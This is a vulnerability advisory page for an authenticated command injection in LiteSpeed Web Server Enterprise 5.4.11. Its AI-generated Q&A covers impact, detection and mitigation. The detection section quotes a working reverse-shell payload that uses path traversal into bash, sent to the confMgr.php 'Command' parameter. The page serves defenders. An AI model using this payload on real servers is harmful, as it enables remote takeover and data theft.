CVE-2021-47903
Authenticated Command Injection in LiteSpeed Web Server 5.4.11 Enables RCE
Publication date: 2026-01-23
Last updated on: 2026-01-23
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| litespeedtech | lite_speed_web_server_enterprise | 5.4.11 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is an authenticated command injection in LiteSpeed Web Server Enterprise version 5.4.11. Authenticated administrators can exploit the 'Command' parameter in the external application configuration interface to inject shell commands. This allows remote code execution through path traversal and bash command injection techniques, enabling attackers to execute arbitrary system commands on the server. [2, 3]
How can this vulnerability impact me? :
If exploited, this vulnerability can allow an authenticated user with administrative access to execute arbitrary commands on the server. This can lead to full system compromise, including unauthorized access, data theft, service disruption, and potentially taking control over the entire server environment. [2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking for unauthorized or suspicious modifications in the external app configuration interface of LiteSpeed Web Server Enterprise version 5.4.11, specifically in the 'Command' parameter used for server configuration. Since exploitation requires authenticated access, monitoring administrative actions and reviewing server configuration changes is essential. A practical detection method includes inspecting HTTP POST requests to the /config/confMgr.php endpoint for unusual payloads in the 'path' or 'Command' parameters. For example, monitoring for commands similar to the payload: fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1' which initiates a reverse shell. Network monitoring tools can be used to detect unexpected outbound connections on uncommon ports (e.g., TCP port 1234 in the example). Specific commands to detect this might include searching server logs for POST requests to /config/confMgr.php or using network tools like tcpdump or netstat to identify suspicious connections. However, no exact detection commands are provided in the resources. [3, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting administrative access to the LiteSpeed Web Server Enterprise configuration interface to trusted users only, ensuring strong authentication mechanisms are in place. Administrators should avoid using version 5.4.11 or upgrade to a patched version if available. Additionally, monitoring and auditing configuration changes in the external app configuration interface can help detect exploitation attempts. Since the vulnerability requires authenticated access, limiting privileges and enforcing least privilege principles can reduce risk. If possible, disable or restrict the use of the 'Command' parameter in server configuration or external app settings. Performing a graceful server restart after configuration changes is necessary to apply fixes or revert malicious changes. Applying network-level protections such as firewall rules to block unexpected outbound connections (e.g., reverse shells) can also help mitigate exploitation. [2, 3]